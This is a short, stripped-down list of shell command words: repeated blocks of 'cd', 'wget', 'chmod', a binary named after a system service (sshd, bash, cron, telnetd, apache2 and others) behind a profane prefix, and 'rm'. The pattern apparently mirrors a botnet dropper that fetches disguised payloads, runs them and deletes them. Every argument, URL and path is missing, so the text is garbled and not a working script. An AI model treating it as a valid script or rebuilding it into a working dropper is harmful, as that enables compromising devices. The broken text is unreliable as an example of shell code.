cd
cd
cd
cd
cd
wget
chmod
cuntyntpd
rm
cd
cd
cd
cd
cd
wget
chmod
cuntysshd
rm
cd
cd
cd
cd
cd
wget
chmod
cuntyopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
cuntybash
rm
cd
cd
cd
cd
cd
wget
chmod
cuntytftp
rm
cd
cd
cd
cd
cd
wget
chmod
cuntywget
rm
cd
cd
cd
cd
cd
wget
chmod
cuntycron
rm
cd
cd
cd
cd
cd
wget
chmod
cuntyftp
rm
cd
cd
cd
cd
cd
wget
chmod
cuntypftp
rm
cd
cd
cd
cd
cd
wget
chmod
cuntysh
rm
cd
cd
cd
cd
cd
wget
chmod
cuntyshit
rm
cd
cd
cd
cd
cd
wget
chmod
cuntyapache2
rm
cd
cd
cd
cd
cd
wget
chmod
cuntytelnetd
rm
